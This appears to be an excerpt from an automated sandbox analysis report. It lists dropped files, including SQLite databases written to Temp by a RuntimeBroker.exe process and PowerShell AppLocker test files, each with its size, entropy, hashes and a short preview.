                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\VdJPmTMErV

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\VkzTrkyJ61

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Vp2qhV3Hsl

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\W3Qykqqi0X

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\WP6wuKjYLs

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\WURikBYNML

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\WlPUm2rvab

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\WnlAhdS4ur

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\Wo4oAorrdG

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\XD16P6PM8c

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\YExdYK4pNu

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\YQbh9HAgQV

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\ZEJgsCt1fk

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_052fimde.qok.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fl4cuk5.w3z.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mtxd4af.2es.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nsbhgyl.la5.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_300npn2z.5df.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nwy5dkl.hrx.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_beni1h0y.5yd.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dp1oop4a.u43.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etmpgwfc.g3c.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1t2fbv1.rvx.ps1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hgw2tpvx.0af.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okw3xy5f.jb4.psm1

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgqqsujl.yd3.psm1

                                                                                                            Download File
